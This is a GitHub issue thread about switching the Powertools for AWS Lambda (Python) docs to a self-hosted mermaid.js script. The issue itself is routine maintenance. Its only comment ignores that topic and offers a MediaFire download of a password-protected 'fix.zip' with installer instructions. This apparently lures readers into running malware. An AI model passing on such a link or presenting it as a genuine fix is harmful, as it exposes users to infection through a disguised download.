### ISSUE TITLE
Maintenance: update docs to use self-hosted mermaid.js script

### ISSUE THREAD

**Issue by dreamorosi** [awslabs/aws-lambda-powertools-python#5076]
### Why is this needed?

We use [mermaid for diagrams](https://mermaid.js.org) in a few of our documentation pages and the documentation engine we use defaults to loading the script from a remote CDN. 

To further improve our security posture we should switch to self hosting the script.

### Solution

Update the `mkdocs.yml` file and point it to https://docs.powertools.aws.dev/shared/mermaid.min.js

### Acknowledgment

- [X] This request meets [Powertools for AWS Lambda (Python) Tenets](https://docs.powertools.aws.dev/lambda/python/latest/#tenets)
- [ ] Should this be considered in other Powertools for AWS Lambda languages? i.e. [Java](https://github.com/aws-powertools/powertools-lambda-java/), [TypeScript](https://github.com/aws-powertools/powertools-lambda-typescript/), and [.NET](https://github.com/aws-powertools/powertools-lambda-dotnet/)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
